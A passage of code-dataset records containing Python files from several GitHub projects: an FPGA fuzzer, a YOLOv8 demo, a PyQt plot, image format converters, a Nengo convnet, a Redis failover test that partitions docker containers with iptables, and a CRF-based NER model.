nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"OUTREG\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.TSREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"TSREG\"), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MIDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MIDDRX2\", \"MIDDRX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MIDDRXN\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODDRXN.DDRMODE\".format(prim), [\"NONE\", \"MOSHX2\", \"MOSHX4\", \"MODDRX2_DQSW\", \"MODDRX4_DQSW\", \"MODDRX2_DQSW270\", \"MODDRX4_DQSW270\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MODDRXN\", dqs=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MTDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MTSHX2\", \"MTSHX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x + \" TOUTMUX:MTDDR\"), scope=\"MTDDRXN\"), False)\n fuzzloops.parallel_foreach(configs, per_config)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gatecat/prjoxide","sub_path":"fuzzers/LIFCL/070-iologic_mode/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":16036,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"18"} +{"seq_id":"72326089639","text":"# 引入cv2用于视频处理\nimport cv2\n# 引入YOLO模型用于目标检测\nfrom ultralytics import YOLO\n\n# 
Load the YOLO model used for object detection\nmodel = YOLO('../weights/yolov8n-seg.pt')\n\n# Open the video file; replace this path with your own\nvideo_path = \"../assets/people_walking_1.mp4\"\ncap = cv2.VideoCapture(video_path)\n\n# Read video frames in a loop\nwhile cap.isOpened():\n    # Read one frame\n    success, frame = cap.read()\n\n    if not success:\n        print(\"No more frames, exiting :) \")\n        break\n\n    if success:\n        # Run object detection on the frame just read\n        results = model(frame)\n\n        # Visualize the results: confidence threshold 0.5, boxes hidden, masks and probabilities shown\n        annotated_frame = results[0].plot(conf=0.5, boxes=False, masks=True, probs=True)\n\n        # Display the annotated frame\n        cv2.imshow(\"YOLOv8 Inference\", annotated_frame)\n\n        # Break out of the loop when the 'q' key is pressed\n        # if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n        #     break\n        if cv2.waitKey(24) == ord('q'):  # 24 ms per frame; at 1 ms the playback ran far too fast\n            break\n\n    else:\n        # The video has ended; break out of the loop\n        break\n\n# Release the video capture object and close all windows\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"LiuEhe/YOLO_detect","sub_path":"demo/yolov8_smaple.py","file_name":"yolov8_smaple.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14073227617","text":"from PyQt5 import QtWidgets, QtCore\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\nimport sys  # We need sys so that we can pass argv to QApplication\nimport os\nfrom random import randint\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n    def __init__(self, *args, **kwargs):\n        super(MainWindow, self).__init__(*args, **kwargs)\n        self.init_status_figure()\n        self.update_status_figure()\n\n    def init_status_figure(self):\n\n        self.graphWidget = pg.PlotWidget()\n        self.setCentralWidget(self.graphWidget)\n\n        self.status_x = list(range(100))  # 100 time points\n        self.status_y = [randint(0,100) for _ in range(100)]  # 100 data points\n\n        self.graphWidget.setBackground('w')\n\n        pen = pg.mkPen(color=(255, 0, 0))\n        self.data_line = self.graphWidget.plot(self.status_x, self.status_y, pen=pen)\n    #\n    # def status_fig_window(self):\n    #     trendGroupBox = QGroupBox(\"\")\n    #     childWindow.setObjectName(\"\")\n    #     childWindow.setWindowTitle(\"Online data monitoring for ADC channel %s\" % str(subindex))\n    #     childWindow.resize(600, 300)  # w*h\n    #     logframe = QFrame()\n    #     logframe.setLineWidth(0.6)\n    #     childWindow.setCentralWidget(logframe)\n    #     self.trendLayout = QGridLayout()\n    #     Fig = self.graphWidget\n    #     self.trendLayout.addWidget(Fig, 0, 0)\n    #     trendGroupBox.setLayout(self.trendLayout)\n    #     logframe.setLayout(self.trendLayout)\n\n    def update_status_figure(self):\n        self.timer = QtCore.QTimer()\n        self.timer.setInterval(50)\n        self.timer.timeout.connect(self.update_communication_status)\n        self.timer.start()\n\n    def update_communication_status(self):\n\n        self.status_x = self.status_x[1:]  # Remove the first x element.\n        self.status_x.append(self.status_x[-1] + 1)  # Add a new value 1 higher than the last.\n\n        self.status_y = self.status_y[1:]  # Remove the first y element.\n        self.status_y.append(randint(0,100))  # Add a new random value.\n\n        self.data_line.setData(self.status_x, self.status_y)  # Update the data.\n\napp = QtWidgets.QApplication(sys.argv)\nw = MainWindow()\nw.show()\nsys.exit(app.exec_())","repo_name":"ahmedqamesh/mopshub-sw-kcu102","sub_path":"test_files/pygraph.py","file_name":"pygraph.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22468099476","text":"import argparse\nfrom collections import defaultdict\nfrom enum import Enum\nimport os\nfrom typing import cast, Dict, Optional, Sequence, Tuple\nfrom typing_extensions import Buffer\n\nimport numpy as 
np\nimport PIL\n\nfrom calliope.models import ImageFormat\nfrom calliope.tables import Image\nfrom calliope.utils.file import get_file_extension\n\n\ndef guess_image_format_from_filename(filename: str) -> ImageFormat:\n    extension = get_file_extension(filename)\n    if extension in (\"raw\", \"rgb565\"):\n        return ImageFormat.RGB565\n    if extension == \"grayscale16\":\n        return ImageFormat.GRAYSCALE16\n    elif extension in (\"jpg\", \"jpeg\"):\n        return ImageFormat.JPEG\n    elif extension == \"png\":\n        return ImageFormat.PNG\n    else:\n        raise ValueError(f\"Unrecognized image format for {filename}\")\n\n\ndef image_format_to_media_type(image_format: ImageFormat) -> str:\n    return image_format.value\n\n\n# For a good discussion of the RGB565 format,\n# see: http://www.barth-dev.de/online/rgb565-color-picker/#\n\n# The below conversion code was inspired by https://github.com/CommanderRedYT\n\n\ndef convert_png_to_rgb565(input_filename: str, output_filename: str) -> Image:\n    \"\"\"\n    Converts the given PNG file to RGB565/raw format.\n    \"\"\"\n    png = PIL.Image.open(input_filename)\n\n    input_image_content = png.getdata()\n    output_image_content = np.empty(len(input_image_content), np.uint16)\n    for i, pixel in enumerate(input_image_content):\n        r = (pixel[0] >> 3) & 0x1F\n        g = (pixel[1] >> 2) & 0x3F\n        b = (pixel[2] >> 3) & 0x1F\n        rgb = r << 11 | g << 5 | b\n        output_image_content[i] = rgb\n\n    with open(output_filename, \"wb\") as output_file:\n        output_file.write(cast(Buffer, output_image_content))\n\n    return Image(\n        width=png.width,\n        height=png.height,\n        format=ImageFormat.RGB565.value,\n        url=output_filename,\n    )\n\n\ndef convert_rgb565_to_png(\n    input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n    \"\"\"\n    Converts the given RGB565/raw file to PNG format.\n    \"\"\"\n    with open(input_filename, \"rb\") as input_file:\n        dataArray = np.fromfile(input_file, np.uint16)\n\n    png = PIL.Image.new(\"RGB\", (width, height))\n\n    for i, word in enumerate(np.nditer(dataArray)):\n        r = (word >> 11) & 0x1F  # type: ignore[operator]\n        g = (word >> 5) & 0x3F  # type: ignore[operator]\n        b = word & 0x1F  # type: ignore[operator]\n        png.putpixel((i % width, i // width), (r << 3, g << 2, b << 3))\n\n    png.save(output_filename)\n\n    return Image(\n        width=width,\n        height=height,\n        format=ImageFormat.PNG.value,\n        url=output_filename,\n    )\n\n\ndef convert_png_to_grayscale16(input_filename: str, output_filename: str) -> Image:\n    \"\"\"\n    Converts the given PNG file to 'grayscale-16' format.\n    There are 2 pixels per byte, 4 bits (black, white, 14 shades of gray) each.\n    \"\"\"\n\n    png = PIL.Image.open(input_filename)\n    # Convert to grayscale.\n    png = png.convert(mode=\"L\")\n\n    input_image_content = png.getdata()\n    output_image_content = np.empty(int(len(input_image_content) / 2), np.uint8)\n    i = 0\n    for y in range(0, png.size[1]):\n        byte = 0\n        done = True\n        for x in range(0, png.size[0]):\n            l = png.getpixel((x, y))\n            if x % 2 == 0:\n                byte = l >> 4\n                done = False\n            else:\n                byte |= l & 0xF0\n                output_image_content[i] = byte\n                done = True\n                i += 1\n        if not done:\n            output_image_content[i] = byte\n\n    with open(output_filename, \"wb\") as output_file:\n        output_file.write(cast(Buffer, output_image_content))\n\n    return Image(\n        width=png.width,\n        height=png.height,\n        format=ImageFormat.GRAYSCALE16.value,\n        url=output_filename,\n    )\n\n\ndef convert_grayscale16_to_png(\n    input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n    \"\"\"\n    Converts 'grayscale-16' file to PNG.\n    There are 2 pixels per byte, 
4 bits (black, white, 14 shades of gray) each.\n    \"\"\"\n\n    with open(input_filename, \"rb\") as input_file:\n        dataArray = np.fromfile(input_file, np.uint8)\n\n    png = PIL.Image.new(\"L\", (width, height))\n\n    for i, pixel_pair in enumerate(np.nditer(dataArray)):\n        p0 = int(pixel_pair & 0xF) << 4  # type: ignore[operator]\n        i *= 2\n        x = i % width\n        y = i // width\n        if y >= height:\n            # Due to an earlier bug, some stored images have too much data.\n            break\n        png.putpixel((x, y), p0)\n\n        p1 = int(pixel_pair) & 0xF0  # The second pixel lives in the high nibble.  # type: ignore[call-overload]\n        i += 1\n        x = i % width\n        y = i // width\n        if y >= height:\n            # Due to an earlier bug, some stored images have too much data.\n            break\n        png.putpixel((x, y), p1)\n\n    png.save(output_filename)\n\n    return Image(\n        width=width,\n        height=height,\n        format=ImageFormat.PNG.value,\n        url=output_filename,\n    )\n\n\ndef convert_pil_image_to_png(image_filename: str) -> str:\n    \"\"\"\n    Converts a standard image file (one understood by\n    the PIL library) to PNG format, if it isn't already, in\n    a new file with the .png extension.\n\n    Note that this won't work with the specialized grayscale\n    and RGB565 formats that Calliope provides for Sparrow hardware,\n    as PIL doesn't support these.\n\n    Args:\n        image_filename: the filename of an image.\n\n    Returns:\n        the filename of the new or existing PNG file.\n    \"\"\"\n    extension = get_file_extension(image_filename)\n    if extension != \"png\":\n        image_filename_png = image_filename + \".png\"\n        img = PIL.Image.open(image_filename)\n        img.save(image_filename_png)\n        image_filename = image_filename_png\n\n    return image_filename\n\n\ndef resize_image_if_needed(\n    input_image: Image,\n    output_image_width: Optional[int],\n    output_image_height: Optional[int],\n    output_filename: str,\n) -> Optional[Image]:\n    \"\"\"\n    Resizes a given image iff necessary given output_image_width and\n    output_image_height.\n    \"\"\"\n    resized_image = None\n\n    if output_image_width and output_image_height:\n        img = PIL.Image.open(input_image.url)\n        if img.width != output_image_width or img.height != output_image_height:\n            # Fit the image into the bounding box given by (output_image_width,\n            # output_image_height)...\n            scaling_factor = min(\n                output_image_width / img.width, output_image_height / img.height\n            )\n            resized_width = int(scaling_factor * img.width)\n            resized_height = int(scaling_factor * img.height)\n            scaled_image_size = (resized_width, resized_height)\n            img = img.resize(scaled_image_size)\n\n            output_image_size = (output_image_width, output_image_height)\n            if output_image_size != scaled_image_size:\n                # If the scaled image doesn't match the requested image size,\n                # add black bars to either side of it...\n                new_image = PIL.Image.new(\n                    \"RGB\", output_image_size\n                )  # A blank image, all black.\n                box = (\n                    (output_image_width - resized_width) // 2,\n                    (output_image_height - resized_height) // 2,\n                )\n\n                # Paste the scaled image into the middle of the black image.\n                new_image.paste(img, box)\n                new_image.save(output_filename)\n                resized_width = output_image_width\n                resized_height = output_image_height\n            else:\n                # Otherwise, just save the resized image.\n                img.save(output_filename)\n\n            resized_image = Image(\n                width=resized_width,\n                height=resized_height,\n                format=input_image.format,\n                url=output_filename,\n            )\n\n    return resized_image\n\n\ndef get_image_attributes(image_filename: str) -> Image:\n    \"\"\"\n    Gets an Image from an image filename.\n    \"\"\"\n    image = PIL.Image.open(image_filename)\n    format = guess_image_format_from_filename(image_filename)\n\n    return Image(\n        
width=image.width,\n        height=image.height,\n        format=format.value,\n        url=image_filename,\n    )\n\n\ndef get_image_colors(image_filename: str) -> Sequence[Tuple[int, int]]:\n    \"\"\"\n    Returns a sequence of (count, color) tuples with colors given in the mode of the image (e.g. RGB).\n    \"\"\"\n    image = PIL.Image.open(image_filename)\n    by_color: Dict[int, int] = defaultdict(int)\n    for pixel in image.getdata():\n        by_color[pixel] += 1\n    return cast(Sequence[Tuple[int, int]], list(by_color.items()))\n\n\ndef image_is_monochrome(image_filename: str) -> bool:\n    \"\"\"\n    Returns True iff the given image is of a single solid color.\n    \"\"\"\n    colors = get_image_colors(image_filename)\n    return colors is not None and len(colors) <= 1\n\n\nclass Mode(Enum):\n    RAW = \".raw\"\n    PNG = \".png\"\n\n\ndef main() -> None:\n    \"\"\"\n    A little utility test harness for conversion to/from the rgb565 format.\n    \"\"\"\n    parser = argparse.ArgumentParser(\n        description=\"Convert a file from one format to another.\"\n    )\n    parser.add_argument(\n        \"-i\",\n        \"--input\",\n        required=True,\n        dest=\"input_file\",\n        help=\"Input file to be converted.\",\n    )\n    parser.add_argument(\n        \"-o\",\n        \"--output\",\n        nargs=\"?\",\n        dest=\"output_file\",\n        help=\"Output file to be converted.\",\n    )\n    parser.add_argument(\n        \"--width\",\n        dest=\"width\",\n        help=\"The image width in pixels.\",\n    )\n    parser.add_argument(\n        \"--height\",\n        dest=\"height\",\n        help=\"The image height in pixels.\",\n    )\n    args = parser.parse_args()\n    input_filename = args.input_file\n    output_filename = args.output_file\n    width = int(args.width) if args.width else 0\n    height = int(args.height) if args.height else 0\n\n    input_basename = os.path.basename(input_filename).rsplit(\".\", 1)\n\n    mode = Mode.RAW if (input_basename[1] == \"png\") else Mode.PNG\n\n    if output_filename is None:\n        output_filename = input_basename[0] + mode.value\n\n    output_basename = os.path.basename(output_filename).rsplit(\".\", 1)\n\n    if len(output_basename) != 2:\n        print(\"Error: Invalid arguments.\")\n        exit(1)\n\n    if input_basename[1] not in [\"png\", \"raw\"]:\n        print(\"Error: Input file must be a .png or .raw file.\")\n        exit(1)\n\n    if output_basename[1] not in [\"png\", \"raw\"]:\n        print(\"Error: Output file must be a .png or .raw file.\")\n        print(f\"Output file: {output_basename}\")\n        exit(1)\n\n    if input_basename[1] == output_basename[1]:\n        print(\"Error: Input and output file must be different.\")\n        exit(1)\n\n    if mode == Mode.PNG:\n        convert_rgb565_to_png(input_filename, output_filename, width, height)\n    else:\n        convert_png_to_rgb565(input_filename, output_filename)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"chrisimmel/calliope","sub_path":"calliope/utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26585854633","text":"import nengo\nimport nengo_dl\nimport numpy as np\n\n\nclass ConvNet(object):\n    def __init__(self, net, max_rate=100):\n        amp = 1 / max_rate\n        net.config[nengo.Ensemble].neuron_type = nengo.RectifiedLinear(amplitude=amp)\n        net.config[nengo.Ensemble].max_rates = nengo.dists.Choice([max_rate])\n        net.config[nengo.Ensemble].intercepts = nengo.dists.Choice([0])\n        net.config[nengo.Connection].synapse = None \n        self.net = net\n        self.layers = []\n        self.output_shapes = []\n        self.input = None\n        \n    def make_input_layer(self, source_shape,\n                         spatial_stride=(1, 1),\n                         spatial_size=None,\n                         use_separate_nodes=False,\n                         index_map=None):        \n        
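# Descriptive note: slide a window of spatial_size over the (channels,\n        # rows, cols) input with the given spatial_stride; each window becomes\n        # one cell in a 2-D grid of patches that later layers connect to\n        # independently.\n        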
if spatial_size is None:\n spatial_size = (source_shape[2], source_shape[1])\n\n with self.net:\n if self.input is None:\n self.input = nengo.Node(\n None,\n size_in=source_shape[0]*source_shape[1]*source_shape[2],\n label='input')\n\n j = 0\n w = spatial_size[0]\n h = spatial_size[1]\n if index_map is not None:\n items = index_map\n else:\n items = np.arange(source_shape[1]*source_shape[2])\n\n items.shape = source_shape[1:]\n layer = []\n while j + h <= source_shape[1]:\n row = []\n i = 0\n while i + w <= source_shape[2]:\n if use_separate_nodes:\n sp = nengo.Node(None, size_in=w*h*source_shape[0],\n label='[%d:%d,%d:%d]' % (j,j+h,i,i+w))\n row.append([sp]) \n\n indices = np.array((items[j:j+h][:,i:i+w]).flat)\n all_indices = []\n for q in range(source_shape[0]):\n all_indices.extend(indices+q*source_shape[1]*source_shape[2])\n \n if use_separate_nodes:\n nengo.Connection(self.input[all_indices], sp)\n else:\n row.append([self.input[all_indices]])\n\n i += spatial_stride[0]\n j += spatial_stride[1]\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append((source_shape[0],\n spatial_size[0],\n spatial_size[1]))\n \n def make_middle_layer(self, n_features, n_parallel,\n n_local, kernel_stride, kernel_size, padding='valid',\n use_neurons=True, init=nengo.dists.Uniform(-1,1)):\n with self.net:\n prev_layer = self.layers[-1]\n prev_output_shape = self.output_shapes[-1]\n layer = []\n for prev_row in prev_layer:\n row = []\n for prev_col in prev_row:\n col = []\n this_index = 0\n \n index = 0\n for k in range(n_parallel):\n prev_index = 0\n if isinstance(init, nengo.dists.Distribution):\n this_inits = [init] * n_local\n else:\n this_inits = []\n prev_size = init.shape[2] // n_local\n\n for i in range(n_local):\n\n this_init = init[:,:,prev_index:prev_index+prev_size,\n this_index:this_index+n_features]\n prev_index = (prev_index + prev_size)\n this_inits.append(this_init)\n this_index = (this_index + n_features)\n\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[0])\n if use_neurons:\n ens = nengo.Ensemble(conv.output_shape.size, dimensions=1,\n label='%s' % conv.output_shape)\n ens_neurons = ens.neurons\n else:\n ens = nengo.Node(None, size_in=conv.output_shape.size,\n label='%s' % conv.output_shape)\n ens_neurons = ens\n for kk in range(n_local):\n prev_k = prev_col[index%len(prev_col)]\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[kk])\n nengo.Connection(prev_k, ens_neurons, transform=conv)\n index += 1\n col.append(ens_neurons)\n row.append(col)\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append(conv.output_shape)\n \n def make_output_layer(self, dimensions):\n with self.net:\n self.output = nengo.Node(None, dimensions, label='output')\n for row in self.layers[-1]:\n for col in row:\n for k in col:\n nengo.Connection(k, self.output,\n transform=nengo_dl.dists.Glorot())\n \n def make_merged_output(self, shape):\n with self.net:\n self.output = nengo.Node(None, size_in=shape[0]*shape[1], label='output')\n indices = np.arange(shape[0]*shape[1]).reshape(shape)\n\n count = np.zeros(self.output.size_out)\n\n patch_shape = self.output_shapes[-1].shape\n assert patch_shape[0] == 1\n i = 0\n j = 0\n for row in self.layers[-1]:\n for n in row:\n assert len(n) == 1\n n = n[0]\n items = 
indices[j:j+patch_shape[2],i:i+patch_shape[1]]\n nengo.Connection(n, self.output[items.flatten()])\n count[items.flatten()] += 1\n i += patch_shape[1]\n j += patch_shape[2]\n i = 0\n assert count.min() == count.max() == 1\n\n","repo_name":"tcstewar/davis_tracking","sub_path":"davis_tracking/spatial_convnet.py","file_name":"spatial_convnet.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"13192126746","text":"\"\"\"\nA simple demo for closer\n\"\"\"\n\nimport argparse\nimport asyncio\nimport logging\nimport time\n\nimport docker\nimport redis\nimport redis.asyncio as async_redis\n\n\nclass Runner:\n def __init__(self, stop_closer=False):\n self.docker_client = docker.from_env()\n self.containers = self.discover_containers()\n self.tasks = {}\n self._should_stop_closer = stop_closer\n self.log = logging.getLogger(__name__)\n self.counter = 1\n self.recorded = set()\n\n async def run_load(self, target):\n \"\"\"\n Run test load against target\n \"\"\"\n while True:\n try:\n conn = async_redis.Redis(host=target, socket_timeout=0.1)\n await conn.ping()\n # Actually we are running in single thread here\n # So no locks/atomics are required\n value = self.counter\n self.counter += 1\n await conn.set(f'{value}', '1')\n self.recorded.add(f'{value}'.encode('utf-8'))\n except asyncio.CancelledError:\n return\n except Exception as exc:\n self.log.debug('Inserting for %s failed: %r', target, exc)\n await asyncio.sleep(0.1)\n\n def discover_containers(self):\n \"\"\"\n Get a map of name -> docker container\n \"\"\"\n res = {}\n for container in self.docker_client.containers.list():\n if container.labels.get('com.docker.compose.project') == 'poor-man-redis-closer':\n service = container.labels['com.docker.compose.service']\n if 'host' not in service:\n continue\n res[service] = container\n return res\n\n def stop_closer(self):\n \"\"\"\n Stop closer in containers\n \"\"\"\n for name, container in self.containers.items():\n res = container.exec_run('supervisorctl stop closer')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to stop closer in {name}: {res.output}')\n\n def wait_redis(self):\n \"\"\"\n Wait for host1 to become primary with 2 replicas\n \"\"\"\n timeout = 60\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n ready = True\n conn = redis.Redis(host='host1')\n info = conn.info('replication')\n if info['connected_slaves'] != 2:\n ready = False\n for host in ['host2', 'host3']:\n replica_conn = redis.Redis(host=host)\n info = replica_conn.info('replication')\n if info['master_link_status'] != 'up':\n ready = False\n sentinel_conn = redis.Redis(host=host, port=26379)\n replicas = sentinel_conn.sentinel_slaves('demo')\n if len(replicas) != 2:\n ready = False\n sentinel_conn = redis.Redis(host='host2', port=26379)\n status = sentinel_conn.sentinel_sentinels('demo')\n if len(status) != 2:\n ready = False\n if ready:\n return\n except Exception as exc:\n self.log.warning('Waiting for redis to become ready: %r', exc)\n time.sleep(1)\n raise RuntimeError('host1 is not ready')\n\n def wait_single_primary(self):\n \"\"\"\n Wait for single primary with 2 replicas\n \"\"\"\n timeout = 180\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n primaries = []\n for name in self.containers:\n conn = redis.Redis(host=name, socket_timeout=0.1)\n info = conn.info('replication')\n if info['role'] == 'master':\n primaries.append(name)\n if len(primaries) == 
1:\n return primaries[0]\n self.log.info('Waiting for single primary. Primaries: %s', ', '.join(primaries))\n except Exception as exc:\n self.log.debug('Waiting for single primary: %r', exc)\n time.sleep(1)\n raise RuntimeError('No single primary after network healing')\n\n def isolate(self, target):\n \"\"\"\n Isolate container from other hosts\n \"\"\"\n target_container = self.containers[target]\n addr = target_container.attrs['NetworkSettings']['Networks']['poor-man-redis-closer_default']['IPAddress']\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run(f'iptables -t filter -I INPUT -s {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {name} from {target}')\n res = container.exec_run(f'iptables -t filter -I OUTPUT -d {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {target} from {name}')\n\n def open(self, target):\n \"\"\"\n Open container for other hosts\n \"\"\"\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run('iptables -t filter -F INPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {name} for {target}')\n res = container.exec_run('iptables -t filter -F OUTPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {target} for {name}')\n\n def count_lost(self, primary):\n \"\"\"\n Count lost record\n \"\"\"\n conn = redis.Redis(host=primary)\n on_primary = set(conn.keys())\n lost = self.recorded.difference(on_primary)\n print(f'Lost keys {len(lost)}/{len(self.recorded)}')\n\n async def load(self):\n \"\"\"\n Async part of run\n \"\"\"\n for host in self.containers:\n self.tasks[host] = asyncio.create_task(self.run_load(host))\n print('Isolating host1')\n self.isolate('host1')\n print('Waiting for 10 minutes')\n await asyncio.sleep(600)\n for task in self.tasks.values():\n task.cancel()\n\n def run(self):\n \"\"\"\n Run demo\n \"\"\"\n self.wait_redis()\n if self._should_stop_closer:\n self.stop_closer()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(self.load())\n self.open('host1')\n print('Waiting for single primary after network heal')\n primary = self.wait_single_primary()\n self.count_lost(primary)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--no-closer', action='store_true', help='Stop closer before running load')\n args = parser.parse_args()\n runner = Runner(args.no_closer)\n runner.run()\n","repo_name":"secwall/poor-man-redis-closer","sub_path":"demo/runner/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22271083811","text":"import torch\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom torch import nn, optim\nfrom torchcrf import CRF\n\nfrom transformers import RobertaModel\n\n\nclass LstmNerModel(nn.Module):\n def __init__(self, embedding_size=256, num_tags=41,\n vocab_size=3675, hidden_size=128,\n batch_first=True, dropout=0.1):\n super(LstmNerModel, self).__init__()\n self.batch_first = batch_first\n self.embedding = nn.Embedding(vocab_size, embedding_size, dtype=torch.float32)\n\n self.lstm = nn.LSTM(embedding_size, hidden_size // 2,\n num_layers=2, batch_first=True,\n bidirectional=True, dropout=dropout)\n for name, param in self.lstm.named_parameters():\n if name.startswith(\"weight\"):\n nn.init.xavier_normal_(param)\n else:\n 
nn.init.zeros_(param)\n\n self.fc = nn.Linear(hidden_size, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor, seq_lens):\n input_tensor = self.embedding(input_tensor)\n total_length = input_tensor.size(1) if self.batch_first else input_tensor.size(0)\n input_packed = pack_padded_sequence(input_tensor, seq_lens, batch_first=self.batch_first, enforce_sorted=False)\n output_lstm, hidden = self.lstm(input_packed)\n output_lstm, length = pad_packed_sequence(output_lstm, batch_first=self.batch_first, total_length=total_length)\n output_fc = self.fc(output_lstm)\n return output_fc\n\n def compute_loss(self, input_tensor, tags, seq_lens):\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n output_fc = self.forward(input_tensor, seq_lens)\n\n loss = -self.crf(output_fc, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor, seq_lens):\n out = self.forward(input_tensor, seq_lens)\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n\n\nclass BertNerModel(nn.Module):\n def __init__(self,\n\n num_tags=41,\n batch_first=True,\n ):\n super(BertNerModel, self).__init__()\n self.batch_first = batch_first\n\n self.model = RobertaModel.from_pretrained(\"hfl/chinese-roberta-wwm-ext\")\n self.fc = nn.Linear(768, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor):\n input_tensor = self.model(input_tensor)\n input_tensor = self.fc(input_tensor.last_hidden_state)\n return input_tensor\n\n def compute_loss(self, input_tensor, tags):\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n output = self.forward(input_tensor)\n loss = -self.crf(output, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor):\n out = self.forward(input_tensor)\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n","repo_name":"liwenju0/chinese_ner_bert_lstm_crf","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"44800500923","text":"\"\"\"\n\n Streamlit webserver-based Recommender Engine.\n\n Author: Explore Data Science Academy.\n\n Note:\n ---------------------------------------------------------------------\n Please follow the instructions provided within the README.md file\n located within the root of this repository for guidance on how to use\n this script correctly.\n\n NB: !! Do not remove/modify the code delimited by dashes !!\n\n This application is intended to be partly marked in an automated manner.\n Altering delimited code may result in a mark of 0.\n ---------------------------------------------------------------------\n\n Description: This file is used to launch a minimal streamlit web\n\tapplication. 
You are expected to extend certain aspects of this script\n and its dependencies as part of your predict project.\n\n\tFor further help with the Streamlit framework, see:\n\n\thttps://docs.streamlit.io/en/latest/\n\n\"\"\"\n# Streamlit dependencies\nimport streamlit as st\nimport joblib,os\n\n# Data handling dependencies\nimport pandas as pd\nimport numpy as np\nimport streamlit.components.v1 as components\nimport plotly.figure_factory as ff\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\n\n# Custom Libraries\nfrom utils.data_loader import load_movie_titles\nfrom recommenders.collaborative_based import collab_model\nfrom recommenders.content_based import content_model\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\n# Data Loading\ntitle_list = load_movie_titles('resources/data/movies.csv')\n\n# App declaration\ndef main():\n\n html_template = \"\"\"\n
